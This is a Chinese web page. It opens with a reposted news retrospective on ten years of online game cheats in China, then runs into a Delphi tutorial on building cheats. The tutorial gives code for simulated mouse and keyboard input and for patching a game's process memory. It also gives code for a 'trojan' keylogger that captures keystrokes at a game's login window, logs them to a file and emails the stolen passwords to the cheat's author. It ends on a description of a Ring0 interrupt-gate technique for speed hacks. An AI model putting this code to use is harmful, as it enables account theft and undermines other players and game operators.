中国网络游戏十年盘点:游戏外挂的发展史(组图)
游戏十年间,伴随网络游戏一同成长的,是游戏“外挂”的发展。十年网游经营路,外挂影响到并毁灭掉的网络游戏数不胜数,即便是目前的各类热门网络游戏产品当中,也不乏存在多多少少的外挂问题。那么外挂的发展是从什么时候开始,这期间又都经历了哪些变革呢?我们不妨通过此次回忆,去了解一下外挂的变迁。 最早的带有外挂性质的软件按键精灵 外挂的发展最早可以追溯到2003年,实际当外挂第一次为游戏而设置功能前,它就以一种特殊的形式存在于网络当中了。2001,当国内互连网已经取得了多数年轻人的喜爱时,能够拥有一台电脑并研究与电脑有关的相关语言程序,是很多最早接触电脑操作者的第一愿望。那个时候国内也出现了不少有关程序开发的论坛,其中兄弟论坛就是当初一家比较默默无闻的网站。 兄弟论坛当中拥有很多对计算机程序开发抱有热情的年轻人,这份热情发展到现在,已经形成了颇有名气的兄弟软件,也正是按键精灵的开发工作室。从2001年最早的按键精灵诞生,到如今最新的7.0版本,按键精灵走过的9年时间,几乎也多多少少伴随网络游戏的火热,而名声大震。 如今,对按键精灵是否能够算做是外挂还有很多分歧,因为它最早的设计理念并非是要让电脑操作者去破坏游戏环境,而是解放自己的双手。按键精灵在电脑虚拟键盘设置操作方面是国内相当出色的一套程序,而作为对这套软件具备一定设计技巧的研究者们,通过自己的看法将其转变到了网络游戏操作当中,这就形成了外挂概念的一个雏形。然而,如果以现在的外挂评价方式去衡量按键精灵的话,它只能算做是一种游戏插件,并不属于危害性高的纯外挂系统。 实际上,早在网络游戏发展之初外挂就已经存在,只是针对单机游戏的特色,它并没有外挂的称呼。中国在单机游戏软件盗版打击上一直很难取得良好的进展,在2000年之前更是难以顾及。当时为了方便玩家游戏出现了很多正规的辅助软件,这其中比较出名的就是金山软件开发的《金山游侠》。说到功能,《金山游侠》是一款功能强大的,可修改游戏数据的专业外挂,但因为其应用在单机游戏当中,玩家购买单机产品后即拥有使用权,因此可以自主决定是否使用第三方软件的方式,并不对游戏开发厂家勾成威胁。然而网络游戏就大为不同了,网络游戏运营商需要通过对产品的持久运营来赚取收益,这就使得与《金山游侠》具备同样性质的软件,一旦进入到网络游戏当中就成为了名副其实的黑手。 声明:人民网游戏频道转载此文出于传递信息之目的,绝不意味着人民网赞同其观点或证实其描述。 热点专题 ·盛大边锋游戏涉赌事件专题 ·网游家长监护工程全面实施 ·2010年度中国游戏产业年会 ·2010年游戏产业热点事件排行榜 上周新闻热点回顾 ·焦点访谈曝光盛大边锋涉嫌违法买卖虚拟货币 ·盛大边锋游戏赌博造就多个利益方 ·畅谈页游的发展方向和桌游的崛起 ·中国网页游戏风云榜金页奖票选涨幅减缓 ·美国暴雪《星际争霸II》3月29日登陆中国 ·暴雪暗示《暗黑破坏神3》将接替WOW ·iPad 2下月香港上市 水货6500元左右” ·iPad2不妨等等 水货售价比官方贵近一倍 ·久游被传空壳 营销中心已调整 ·封锁iPad2越狱漏洞 iOS 4.3.1版本曝光 ·游戏美女杀入国际空姐比赛 成功晋级 ·第一美女强势来袭 张馨予浴池诱惑写真 中国最早的外挂机制替代操作与加速 玩网络游戏总会感觉到累,对于最初游戏中完全依靠玩家消耗时间来积累经验等级的方式而言,能够让自己不在电脑前的时候也能够杀怪得经验,是很多游戏人的梦想。这样一来第一批外挂出现了,他们的出现并不是让玩家在短时间内达到什么样的高级等级,而是通过解放双手的形式,让你并不需要把自己的全部时间花费在电脑前,就可以如同本人一样完成对游戏的操作。按键精灵在这一阶段被得到了广泛的应用,一些对该软件熟练掌握的游戏玩家甚至将其编辑成脚本共享到互连网上,这大大推动了按键精灵的发展,也让通过第三方软件来辅助游戏的概念进入了最早的玩家心中。 然而,与按键精灵只是解放双手不同,外挂的需求在网络游戏的不断发展之下开始拥有了自己的独特方式。就好比一个正常人思维一样,当你发现自己可以不动手就能够赢得某些成就的时候,紧接下来的追求就会变为如何不动手还用时少来换取同样的成绩。这种想法也许是当初掌握一定技术玩家的最初本质,然而当第一款为了追求游戏效率诞生的软件出现之后,外挂的这一名称也就被首次定义了。 最早被定义成外挂的游戏外程序就是加速器。加速器在网络游戏发展当中,一直以一种很特殊的形式而存在。在最早的2D网络游戏时代,加速器可以改变人物的移动速度,让平时需要行进几分钟的地图,可以被瞬间穿越。直到2004年,刚刚在国内运营火爆的《魔兽世界》还曾出现过加速器问题,其通过对3D角色的移动加速造成了PK不平衡的局面,险些令这款世纪级大作难以赢来周年庆典。对比解放双手与提高效率,后者对网游的危害性更高,因为其开发的目的就是为了使用者可以在游戏过程中减少时间,缩短流程,这种模式对于网游开发者的初期效果相比,已经并不在同一思想上。因此当第一款加速器诞生并流行网络游戏之中后,外挂的称呼也被扣在了此类程序之上。中国网络游戏玩家第一次有了对外挂的概念,而游戏运营商也在此时开始关注起了网游外挂的危害性。 声明:人民网游戏频道转载此文出于传递信息之目的,绝不意味着人民网赞同其观点或证实其描述。 热点专题 ·盛大边锋游戏涉赌事件专题 ·网游家长监护工程全面实施 ·2010年度中国游戏产业年会 ·2010年游戏产业热点事件排行榜 上周新闻热点回顾 ·焦点访谈曝光盛大边锋涉嫌违法买卖虚拟货币 ·盛大边锋游戏赌博造就多个利益方 ·畅谈页游的发展方向和桌游的崛起 ·中国网页游戏风云榜金页奖票选涨幅减缓 ·美国暴雪《星际争霸II》3月29日登陆中国 ·暴雪暗示《暗黑破坏神3》将接替WOW ·iPad 2下月香港上市 水货6500元左右” ·iPad2不妨等等 水货售价比官方贵近一倍 ·久游被传空壳 营销中心已调整 ·封锁iPad2越狱漏洞 iOS 4.3.1版本曝光 ·游戏美女杀入国际空姐比赛 成功晋级 ·第一美女强势来袭 张馨予浴池诱惑写真 在概念和技术上的演变与发展 外挂在10年发展当中,取得了很多的进步。先不说其对网络游戏的危害性有多高,但是凭借其因网游而出现的一系列变迁来看,外挂的技术演变就一直伴随着网游技术的发展而发展。不论是何种网络游戏的外挂程序,其第一版本到最终版本之间都会拥有很大的提升,一款外挂研究者所花费的经历实际与软件开发人员差不多,只是对于中国的网络游戏运营商而言,这一努力似乎用错了地方。 在中国,外挂的发展概念基本可以分为三个阶段:首先,解放玩家双手,让人更轻松的游戏。 网络游戏设置之初,其目的都是为了玩家可以长久的去体验一款网游的内容。然而伴随大家对网络游戏的了解,一款游戏能够玩好往往需要两到三年的时间。这样的漫长对于操作者来说是难以想像的,因此通过解放双手来减少自身压力的想法,成为了第一批外挂开发者的初衷。实际上最早的外挂并非具备太大的危害性,因为即便是可以自动回血回蓝的外挂流行于《传奇》时代,玩家还是需要为自己的角色包裹放满足够的药品才可以完成这类操作。然而,在那个极品装备靠运气,靠拾取速度定义的年代,一款可以具备自动拾取物品的外挂就打破了整个游戏世界的平衡,自己打到的装备被远在几格外的外挂玩家拾了去,这种愤怒也是爆发在网游玩家与外挂玩间之间的首个问题。 就这样,解放双手的外挂在操作中因一些特殊遭遇而变了味道。索性当大家发现这一特点后,很多人开启外挂的目的,就是为了更方便的抢夺它人战利品。不过这个时代不论是外挂开发者还是使用者都抱有的目的很单纯,起码没有任何一方会想到这将为网络游戏带来什么后果,只是单纯的私欲成为了外挂泛滥的起点。 其次,改变游戏效率,让自己成为焦点。 这个阶段的外挂开发者开始追求名誉了,自己开发的一款外挂产品,能够被某款游戏的多数玩家所认可使用,也许是对他们最大的满足。这就好比是兄弟间的一场挑侃一样,当双方都在对比自己开发的外挂有多少人在使用时,借助庞大的网游用户市场来说,无非是一件相当有意思的事情。不过当这种想法诞生之后,不同的程序员为了表现自己在外挂开放方面的实力就会加强对外挂功能的研究,最早通过按键精灵编写脚本的方式,也直接成了读取游戏数据包从而改写游戏内存纪录代码为主要方式。这样的外挂在应用上对网游平衡性的影响更为巨大,其为网络游戏运营商所带来的损失也更加难以估计。 这一阶段出现了不少的外挂种类,而玩家对于外挂的选择也开始变的复杂起来。但是有一点可以肯定,使用效果出众的外挂程序往往是通过口碑式的传播来展开,并非最早那样拥有一个下载页面就可以吸引更多的用户访问。外挂的流行也间接的给了盗号者一定的机会,一些别有用心的人通过发布虚假的外挂程序,吸引游戏玩家前来下载安装来实现自己的盗号目的。不过正是因为这类网站的出现,外挂的真实性开始得到一些玩家的置疑,于是外挂开发理念再一次发生了质的改变,而这也是加大外挂问题的一个关键点。 最后,外挂逐步商业化,危害性突出。 外挂的危害性突出正是由外挂的商业化引起的。在2003年之间,由于借助《传奇》、《奇迹》等流行网游而盛行的各类外挂开始找寻自己的存在价值。外挂如同网络游戏一样拥有了自己的价格,包月,购买使用权等收费方式,让游戏玩家在为游戏支出的同时又增加了一部分额外的花销。然而,一些玩家在对比外挂使用的开销后还是选择了为外挂付费,这样的态度使得外挂在2003年至2005年之间,大行其道。 在该阶段,外挂的发展开始出现了品牌化的概念,服务理念也上升到了一个全新的高度。外挂开发者往往不再是一个人,而是一小群人聚集在一起,将其当作自己的一个事业在进行。游戏外挂的更新往往还会伴随网络游戏的版本更新而升级,其持续提供服务的能力,让众多外挂使用者无法自拔。随后,网络游戏运营商终于按耐不住开始着手打击,外挂因此走向了与厂商势不两立的局面。 外挂在过去曾经有过相当风光的一段日子,任何一款在市场上推出的网络游戏,几乎都伴随各类的收费、免费、试用型外挂。实际外挂的流行在很大程度上也与中国的玩家素质有关,用于不用在法律监管力度上的缺乏,逐渐转变成了你用我不用就落伍的错误思想。好多人甚至认为,外挂的出现是因为这款游戏吸引人,让外挂开发者有利可图,于是“一款没有外挂的游戏不算好游戏”的想法也因此诞生。这样的错误理论让2005年以前刚刚萌芽的网络游戏产业受到了外挂的严重影响,这就如同一场自然灾害一样,让当时运营机制和运营经验不足的网游运营商们,只能坐观外挂的横行和演变,从而导致自己的产品下线甚至企业破产。 声明:人民网游戏频道转载此文出于传递信息之目的,绝不意味着人民网赞同其观点或证实其描述。 热点专题 ·盛大边锋游戏涉赌事件专题 ·网游家长监护工程全面实施 ·2010年度中国游戏产业年会 ·2010年游戏产业热点事件排行榜 上周新闻热点回顾 ·焦点访谈曝光盛大边锋涉嫌违法买卖虚拟货币 ·盛大边锋游戏赌博造就多个利益方 ·畅谈页游的发展方向和桌游的崛起 ·中国网页游戏风云榜金页奖票选涨幅减缓 ·美国暴雪《星际争霸II》3月29日登陆中国 ·暴雪暗示《暗黑破坏神3》将接替WOW ·iPad 2下月香港上市 水货6500元左右” ·iPad2不妨等等 水货售价比官方贵近一倍 ·久游被传空壳 营销中心已调整 ·封锁iPad2越狱漏洞 iOS 4.3.1版本曝光 ·游戏美女杀入国际空姐比赛 成功晋级 ·第一美女强势来袭 张馨予浴池诱惑写真 与厂商在暗斗中逐渐成长 外挂从出现至今,一直没有获得妥善的坚决。而不论是游戏厂商还是政府监管部门,都在积极寻求一种解决的方式。从2006年开始,当中国多数网络游戏企业开始大力打击外挂现象的时候,一些比较具有思想的外挂开发人员着手考虑新的思路来维持自己的这份事业。 在2003年盛大,第九城市饱受外挂之苦的时期,这两家国内较早接触网络游戏代理的企业,就开始着手寻找自己的解决方式。随后,不论是借助国家公安机关,还是提供巨额奖金来获取网民举报线索,中国的网络游戏产业在应对外挂问题上,还算取得了一定方法,使中国网游的外挂局面得到了一定缓解。然而,外挂并没有被根除依然还是事实,要让中国的网络游戏产业没有任何一款外挂程序存在,在如今还是很不现实的想法。 因此,外挂与游戏厂商之间在10年经营发展中形成了一种不断斗法的局面。一个是要力争自己成为一种网游产业的附属品,如同网游周边那样正式存在下去。而另一方则是视其水火不相容,势要将其毁灭于萌芽期。这样的局面让外挂与厂商在应对问题上都产生了特殊的变化,我们不妨通过外挂与厂商应对方式上的一种对比,来说明问题。 首先,厂商在触发外挂问题上的转变。最早的处罚方式很简单,就是网游运营厂商在发现具体线索后,向国家公安部门举报,讲外挂开发者进行逮捕。随后,外挂的开发与传播更加秘密,厂家在配合公安部门取证方面存在压力,因此游戏运营厂家为保护自身合法利益,提供巨额奖金来刺激民间举报的监督热情。然而,举报模式尽管起到了很好的效果,但依然不能完全控制外挂的使用,这时候的游戏运营厂商才发现一个关键所在,那就是外挂的出现是伴随拥有使用群体而生的。这样一来游戏厂家打击外挂的方式除单一找寻外挂源头外,还加上了打击外挂使用者,这就是封停帐号的由来。 其次,外挂开发者在商业化运作下开始寻求出路。不论是何种原因,外挂一旦接触到扰乱网游平衡性的问题就会成为厂家的打击对象。而游戏厂商打击外挂的主要原因,也是其严重破坏游戏的平衡世界,让游戏的寿命缩短。这样一来,一些软件开发者开始寻求更为合理的方式让外挂以一种全新的方式去出现,这样一种思想演变而来的产物,就是一种网游外挂的变种,它就是所谓的插件程序。在本质理解上,什么样的程序是外挂或是插件很难被区分。但如今伴随一些插件被官方游戏所认可,插件与外挂的定义也出现了明确的区分。插件是辅助游戏的一种第三方程序,其在辅助内容上并不存在修改游戏数据,破坏游戏平衡的因素。比如《魔兽世界》的大脚插件,其附带的功能只是显示玩家现有血量等便民功能,对游戏世界的平衡性影响几乎为零。而外挂则不同,外挂的定义已经专门针对对网络游戏虚拟世界造成严重不平衡的情况。于是,当插件与外挂定义区分开来后,厂家开始对插件放松了监督甚至主动吸纳其成为自己产品的一个附属服务内容,而外挂则依然如同大敌一样被喊打至今。 声明:人民网游戏频道转载此文出于传递信息之目的,绝不意味着人民网赞同其观点或证实其描述。 热点专题 ·盛大边锋游戏涉赌事件专题 ·网游家长监护工程全面实施 ·2010年度中国游戏产业年会 ·2010年游戏产业热点事件排行榜 上周新闻热点回顾 ·焦点访谈曝光盛大边锋涉嫌违法买卖虚拟货币 ·盛大边锋游戏赌博造就多个利益方 ·畅谈页游的发展方向和桌游的崛起 ·中国网页游戏风云榜金页奖票选涨幅减缓 ·美国暴雪《星际争霸II》3月29日登陆中国 ·暴雪暗示《暗黑破坏神3》将接替WOW ·iPad 2下月香港上市 水货6500元左右” ·iPad2不妨等等 水货售价比官方贵近一倍 ·久游被传空壳 营销中心已调整 ·封锁iPad2越狱漏洞 iOS 4.3.1版本曝光 ·游戏美女杀入国际空姐比赛 成功晋级 ·第一美女强势来袭 张馨予浴池诱惑写真 外挂的未来发展趋势与厂家应对方式 如今,外挂和插件已经成为了伴随网络游戏发展而来的两个全新内容。其中插件是真正帮助网游玩家的第三方程序,因此还拥有自己的发展空间。而外挂则因为破坏游戏平衡,至今被各游戏厂家喊打不及。如今的网络游戏发展也在改变着自己的方式,一些游戏厂家甚至自己开发一些游戏辅助功能来缓解自己产品的外挂问题,这就是所谓的“内挂”产生的原因。 外挂的打击方式依然无法获得一个肯定的解决,中国在外挂监督和处罚立法上的确实,也很难在短时间内彻底消灭外挂的滋扰。实际上这一难定义的局面很容易理解,如果外挂的开发者是以商业化为目的的话,那么管理和处罚还相对简单。而如果开发者只是兴趣,令其自由传播的话,这种外挂的干扰处理方式还是相当难以控制的。 外挂的控制在如今对比2005年以前已经相当收敛,然而不论网游运营厂商寻找什么样的方式去监督,都还无法获得满意的结局。即便一些大型游戏企业为了解决外挂影响,对自己运营产品中的用户使用外挂现象进行大规模封停处罚,但一款游戏中的玩家数量是有限的,被封停的帐号同样付出了时间,这样的强力打击手段对于使用外挂玩家本身而言,与直接将其踢出游戏没有任何差异。于是厂家的大规模封停也会担心自身产品用户的急速减少,这种左右为难的局面还是存在于大多网游当中。 未来的外挂会如何发展,它在网络游戏市场中的位置又当如何?回顾外挂发展的十年时间,我们似乎很难下出结论。也许,有一天外挂真的能够消失。但就中国的网络游戏环境而言,说不定未来的外挂会成为一种特殊的第三方软件,与虚拟交易一样正式成为网游产业的附属品。不过外挂的危害性定义还可谓是准确的,因为不论是对游戏厂家还是非外挂玩家而言,使用外挂来实现自己游戏成就的方式都难以获得认同。 声明:人民网游戏频道转载此文出于传递信息之目的,绝不意味着人民网赞同其观点或证实其描述。 热点专题 ·盛大边锋游戏涉赌事件专题 ·网游家长监护工程全面实施 ·2010年度中国游戏产业年会 ·2010年游戏产业热点事件排行榜 上周新闻热点回顾 ·焦点访谈曝光盛大边锋涉嫌违法买卖虚拟货币 ·盛大边锋游戏赌博造就多个利益方 ·畅谈页游的发展方向和桌游的崛起 ·中国网页游戏风云榜金页奖票选涨幅减缓 ·美国暴雪《星际争霸II》3月29日登陆中国 ·暴雪暗示《暗黑破坏神3》将接替WOW ·iPad 2下月香港上市 水货6500元左右” ·iPad2不妨等等 水货售价比官方贵近一倍 ·久游被传空壳 营销中心已调整 ·封锁iPad2越狱漏洞 iOS 4.3.1版本曝光 ·游戏美女杀入国际空姐比赛 成功晋级 ·第一美女强势来袭 张馨予浴池诱惑写真来源新华网)(责任编辑:Newshoo)
近期热点关注Delphi深度之旅——网络游戏外挂制作
今天图老师小编给大家精心推荐个Delphi深度之旅——网络游戏外挂制作教程,一起来看看过程究竟如何进行吧!喜欢还请点个赞哦~
在几年前我看到别人玩网络游戏用上了外挂,做为程序员的我心里实在是不爽,想搞清楚这到底是怎么回事。就拿了一些来研究,小有心得,拿出来与大家共享,外挂无非就是分几种罢了(依制作难度): 1、动作式,所谓动作式,就是指用API发命令给窗口或API控制鼠标、键盘等,使游戏里的人物进行流动或者攻击,最早以前的石器外挂就是这种方式。 2、本地修改式,这种外挂跟传统上的一些游戏修改器没有两样,做这种外挂在编程只需要对内存地址有一点认识并且掌握API就可以实现,精灵的外挂这是这种方式写成的,它的难点在于找到那些地址码,找地址一般地要借助于别人的工具,有的游戏还有双码校验,正正找起来会比较困难。 3、木马式,这种外挂的目的是帮外挂制作者偷到用户的密码,做这种外挂有一定的难度,需要HOOK或键盘监视技术做底子,才可以完成,它的原理是先首截了用户的帐号或密码,然后发到指定邮箱。 4、加速式,这种外挂可以加快游戏的速度。原本我一直以为加速外挂是针对某个游戏而写的,后来发现我这种概念是不对的,所谓加速外挂其实是修改时钟频率达到加速的目的。 5、封包式,这种外挂是高难度外挂,需要有很强的编程功力才可以写得出来。它的原理是先截取封包,后修改,再转发。这种外挂适用于大多数网络游戏,像WPE及一些网络游戏外挂都是用这种方式写成的,编写这种外挂需要apihook技术,winsock2技术 以下就用Delphi实现网络游戏外挂。 =================================================================================== 上回对五种类型的外挂做了一个大体的概括,大家对这几种外挂都有了一定的了解,现在就依次(制作难度)由浅到深谈谈我对外挂制作的一些认识吧~~~~ 首先,先来谈一下动作式的外挂,这也是我第一次写外挂时做的最简单的一种。 记得还在石器时代的时候,我看到别人挂着一种软件(外挂)人物就可以四外游走(当时我还不知道外挂怎么回事^_^),于是找了这种软件过来研究(拿来后才听别人说这叫外挂),发现这种东东其实实现起来并不难,仔佃看其实人物的行走无非就是鼠标在不同的地方点来点去而已,看后就有实现这功能的冲动,随后跑到MSDN上看了一些资料,发现这种实现这几个功能,只需要几个简单的API函数就可以搞定: 1、首先我们要知道现在鼠标的位置(为了好还原现在鼠标的位置)所以我们就要用到API函数GetCursorPos,它的使用方法如下:BOOL GetCursorPos(LPPOINT lpPoint // address of structure for cursor position); 2、我们把鼠标的位置移到要到人物走到的地方,我们就要用到SetCursorPos函数来移动鼠标位置,它的使用方法如下:BOOL SetCursorPos(int X, // horizontal positionint Y // vertical position); 3、模拟鼠标发出按下和放开的动作,我们要用到mouse_event函数来实现,具休使用方法用下:VOID mouse_event(DWORD dwFlags, // flags specifying various motion/click variantsDWORD dx, // horizontal mouse position or position changeDWORD dy, // vertical mouse position or position changeDWORD dwData, // amount of wheel movementDWORD dwExtraInfo // 32 bits of application-defined information); 在它的dwFlags处,可用的事件很多如移动MOUSEEVENTF_MOVE,左键按下MOUSEEVENTF_LEFTDOWN,左键放开MOUSEEVENTF_LEFTUP,具体的东东还是查一下MSDN吧~~~~~ 好了,有了以前的知识,我们就可以来看看人物移走是怎么实现的了:getcursorpos(point);setcursorpos(ranpoint(80,windowX),ranpoint(80,windowY));//ranpoint是个自制的随机坐标函数mouse_event(MOUSEEVENTF_LEFTDOWN,0,0,0,0);mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,0);setcursorpos(point.x,point.y); 看了以上的代码,是不是觉得人物的游走很简单啦~~,举一仿三,还有好多好东东可以用这个技巧实现(我早就说过,TMD,这是垃圾外挂的做法,相信了吧~~~),接下来,再看看游戏里面自动攻击的做法吧(必需游戏中攻击支持快捷键的),道理还是一样的,只是用的API不同罢了~~~,这回我们要用到的是keybd_event函数,其用法如下:VOID keybd_event(BYTE bVk, // virtual-key codeBYTE bScan, // hardware scan codeDWORD dwFlags, // flags specifying various function optionsDWORD dwExtraInfo // additional data associated with keystroke); 我们还要知道扫描码不可以直接使用,要用函数MapVirtualKey把键值转成扫描码,MapVirtualKey的具体使用方法如下:UINT MapVirtualKey(UINT uCode, // virtual-key code or scan codeUINT uMapType // translation to perform); 好了,比说此快接键是CTRL+A,接下来让我们看看实际代码是怎么写的:keybd_event(VK_CONTROL,mapvirtualkey(VK_CONTROL,0),0,0);keybd_event(65,mapvirtualkey(65,0),0,0);keybd_event(65,mapvirtualkey(65,0),keyeventf_keyup,0);keybd_event(VK_CONTROL,mapvirtualkey(VK_CONTROL,0),keyeventf_keyup,0); 首先模拟按下了CTRL键,再模拟按下A键,再模拟放开A键,最后放开CTRL键,这就是一个模拟按快捷键的周期。 (看到这里,差不多对简易外挂有了一定的了解了吧~~~~做一个试试?如果你举一仿三还能有更好的东东出来,这就要看你的领悟能力了~~,不过不要高兴太早这只是才开始,以后还有更复杂的东东等着你呢~~) =============================================================== 上回我们对动作式外挂做了一个解析,动作式是最简单的外挂,现在我们带来看看,比动作式外挂更进一步的外挂本地修改式外挂的整个制作过程进行一个详细的分解。 具我所知,本地修改式外挂最典型的应用就是在精灵游戏上面,因为我在近一年前(精灵还在测试阶段),我所在的公司里有很多同事玩精灵,于是我看了一下游戏的数据处理方式,发现它所发送到服务器上的信息是存在于内存当中(我看后第一个感受是:修改这种游戏和修改单机版的游戏没有多大分别,换句话说就是在他向服务器提交信息之前修改了内存地址就可以了),当时我找到了地址于是修改了内存地址,果然,按我的想法修改了地址,让系统自动提交后,果然成功了~~~~~,后来精灵又改成了双地址校检,内存校检等等,在这里我就不废话了~~~~,OK,我们就来看看这类外挂是如何制作的: 在做外挂之前我们要对Windows的内存有个具体的认识,而在这里我们所指的内存是指系统的内存偏移量,也就是相对内存,而我们所要对其进行修改,那么我们要对几个Windows API进行了解,OK,跟着例子让我们看清楚这种外挂的制作和API的应用(为了保证网络游戏的正常运行,我就不把找内存地址的方法详细解说了): 1、首先我们要用FindWindow,知道游戏窗口的句柄,因为我们要通过它来得知游戏的运行后所在进程的ID,下面就是FindWindow的用法:HWND FindWindow(LPCTSTR lpClassName, // pointer to class nameLPCTSTR lpWindowName // pointer to window name);2、我们GetWindowThreadProcessId来得到游戏窗口相对应进程的进程ID,函数用法如下:DWORD GetWindowThreadProcessId(HWND hWnd, // handle of windowLPDWORD lpdwProcessId // address of variable for process identifier); 3、得到游戏进程ID后,接下来的事是要以最高权限打开进程,所用到的函数OpenProcess的具体使用方法如下:HANDLE OpenProcess(DWORD dwDesiredAccess, // access flagBOOL bInheritHandle, // handle inheritance flagDWORD dwProcessId // process identifier); 在dwDesiredAccess之处就是设存取方式的地方,它可设的权限很多,我们在这里使用只要使用PROCESS_ALL_ACCESS 来打开进程就可以,其他的方式我们可以查一下MSDN。 4、打开进程后,我们就可以用函数对存内进行操作,在这里我们只要用到WriteProcessMemory来对内存地址写入数据即可(其他的操作方式比如说:ReadProcessMemory等,我在这里就不一一介绍了),我们看一下WriteProcessMemory的用法:BOOL WriteProcessMemory(HANDLE hProcess, // handle to process whose memory is written toLPVOID lpBaseAddress, // address to start writing toLPVOID lpBuffer, // pointer to buffer to write data toDWORD nSize, // number of bytes to writeLPDWORD lpNumberOfBytesWritten // actual number of bytes written); 5、下面用CloseHandle关闭进程句柄就完成了。 这就是这类游戏外挂的程序实现部份的方法,好了,有了此方法,我们就有了理性的认识,我们看看实际例子,提升一下我们的感性认识吧,下面就是XX游戏的外挂代码,我们照上面的方法对应去研究一下吧:constResourceOffset: dword = $;resource: dword = ;ResourceOffset1: dword = $;resource1: dword = ;ResourceOffset2: dword = $0043FA50;resource2: dword = 1280185;ResourceOffset3: dword = $0043FA54;resource3: dword = ;ResourceOffset4: dword = $0043FA58;resource4: dword = ;varhw: HWND;pid:h: THtt: Cbeginhw := FindWindow('XX', nil);if hw = 0 thenEGetWindowThreadProcessId(hw, @pid);h := OpenProcess(PROCESS_ALL_ACCESS, false, pid);if h = 0 thenEif flatcheckbox1.Checked=true thenbeginWriteProcessMemory(h, Pointer(ResourceOffset), @Resource, sizeof(Resource), tt);WriteProcessMemory(h, Pointer(ResourceOffset1), @Resource1, sizeof(Resource1), tt);if flatcheckbox2.Checked=true thenbeginWriteProcessMemory(h, Pointer(ResourceOffset2), @Resource2, sizeof(Resource2), tt);WriteProcessMemory(h, Pointer(ResourceOffset3), @Resource3, sizeof(Resource3), tt);WriteProcessMemory(h, Pointer(ResourceOffset4), @Resource4, sizeof(Resource4), tt);MessageBeep(0);CloseHandle(h); 这个游戏是用了多地址对所要提交的数据进行了校验,所以说这类游戏外挂制作并不是很难,最难的是要找到这些地址。 ================================================================ 以前介绍过的动作式,本地修改式外挂是真正意义上的外挂,而今天本文要介绍的木马式外挂,可能大多像木马吧,是帮助做外挂的人偷取别人游戏的帐号及密码的东东。因为网络上有此类外挂的存在,所以今天不得不说一下(我个人是非常讨厌这类外挂的,请看过本文的朋友不要到处乱用此技术,谢谢合作)。要做此类外挂的程序实现方法很多(比如HOOK,键盘监视等技术),因为HOOK技术对程序员的技术要求比较高并且在实际应用上需要多带一个动态链接库,所以在文中我会以键盘监视技术来实现此类木马的制作。键盘监视技术只需要一个.exe文件就能实现做到后台键盘监视,这个程序用这种技术来实现比较适合。 在做程序之前我们必需要了解一下程序的思路: 1、我们首先知道你想记录游戏的登录窗口名称。 2、判断登录窗口是否出现。 3、如果登录窗口出现,就记录键盘。 4、当窗口关闭时,把记录信息,通过邮件发送到程序设计者的邮箱。 第一点我就不具体分析了,因为你们比我还要了解你们玩的是什么游戏,登录窗口名称是什么。从第二点开始,我们就开始这类外挂的程序实现之旅: 那么我们要怎么样判断登录窗口虽否出现呢?其实这个很简单,我们用FindWindow函数就可以很轻松的实现了:HWND FindWindow(LPCTSTR lpClassName, // pointer to class nameLPCTSTR lpWindowName // pointer to window name); 实际程序实现中,我们要找到'xx'窗口,就用FindWindow(nil,'xx')如果当返回值大于0时表示窗口已经出现,那么我们就可以对键盘信息进行记录了。 先首我们用SetWindowsHookEx设置监视日志,而该函数的用法如下: HHOOK SetWindowsHookEx(int idHook, // type of hook to installHOOKPROC lpfn, // address of hook procedureHINSTANCE hMod, // handle of application instanceDWORD dwThreadId // identity of thread to install hook for); 在这里要说明的是在我们程序当中我们要对HOOKPROC这里我们要通过写一个函数,来实现而HINSTANCE这里我们直接用本程序的HINSTANCE就可以了,具体实现方法为: hHook := SetWindowsHookEx(WH_JOURNALRECORD, HookProc, HInstance, 0); 而HOOKPROC里的函数就要复杂一点点:function HookProc(iCode: wParam: wP lParam: lParam): LRbeginif findedtitle then //如果发现窗口后beginif (peventmsg(lparam)^.message = WM_KEYDOWN) then //消息等于键盘按下hookkey := hookkey + Form1.Keyhookresult(peventMsg(lparam)^.paramL, peventmsg(lparam)^.paramH); //通过keyhookresult(自定义的函数,主要功能是转换截获的消息参数为按键名称。我会在文章尾附上转化函数的)转换消息。if length(hookkey)
0 then //如果获得按键名称beginWrite(hookkeyFile,hookkey); //把按键名称写入文本文件hookkey := ''; 以上就是记录键盘的整个过程,简单吧,如果记录完可不要忘记释放呀,UnHookWindowsHookEx(hHook),而hHOOK,就是创建setwindowshookex后所返回的句柄。 我们已经得到了键盘的记录,那么现在最后只要把记录的这些信息发送回来,我们就大功造成了。其他发送这块并不是很难,只要把记录从文本文件里边读出来,用DELPHI自带的电子邮件组件发一下就万事OK了。代码如下:assignfile(ReadFile,'hook.txt'); //打开hook.txt这个文本文件reset(ReadFile); //设为读取方式tryWhile not Eof(ReadFile) do //当没有读到文件尾beginReadln(ReadFile,s,j); //读取文件行body:=body+s;finallyclosefile(ReadFile); //关闭文件nmsmtp1.EncodeType:=uuM //设置编码nmsmtp1.PostMessage.Attachments.Text:=''; //设置附件nmsmtp1.PostMessage.FromAddress:=''; //设置源邮件地址nmsmtp1.PostMessage.ToAddress.Text:=''; /设置目标邮件地址nmsmtp1.PostMessage.Body.Text:='密码'+' '+ //设置邮件内容nmsmtp1.PostMessage.Subject:='password'; //设置邮件标题nmsmtp1.SendM //发送邮件 ================================================================================== 我一直没有搞懂制作加速外挂是怎么一回事,直到前不久又翻出来了2001年下半期的《程序员合订本》中《变速齿轮研究手记》重新回味了一遍,才有了一点点开悟,随后用Delphi重写了一遍,下面我就把我的心得说给大家听听,并且在此感谢《变速齿轮研究手记》作者褚瑞大虲给了提示。废话我就不多说了,那就开始神奇的加速型外挂体验之旅吧! 原本我一直以为加速外挂是针对某个游戏而写的,后来发现我这种概念是不对的,所谓加速外挂其实是修改时钟频率达到加速的目的。 以前DOS时代玩过编程的人就会马上想到,这很简单嘛不就是直接修改一下8253寄存器嘛,这在以前DOS时代可能可以行得通,但是windows则不然。windows是一个32位的操作系统,并不是你想改哪就改哪的(微软的东东就是如此霸气,说不给你改就不给你改^_^),但要改也不是不可能,我们可以通过两种方法来实现:第一是写一个硬件驱动来完成,第二是用Ring0来实现(这种方法是CIH的作者陈盈豪首用的,它的原理是修改一下IDT表-创建一个中断门-进入Ring0-调用中断修改向量,但是没有办法只能用ASM汇编来实现这一切*_*,做为高级语言使用者惨啦!),用第一种方法用点麻烦,所以我们在这里就用第二种方法实现吧~~~ 在实现之前我们来理一下思路吧: 1、我们首先要写一个过程在这个过程里嵌入汇编语言来实现修改IDE表、创建中断门,修改向量等工作 2、调用这个过程来实现加速功能 好了,现在思路有了,我们就边看代码边讲解吧: 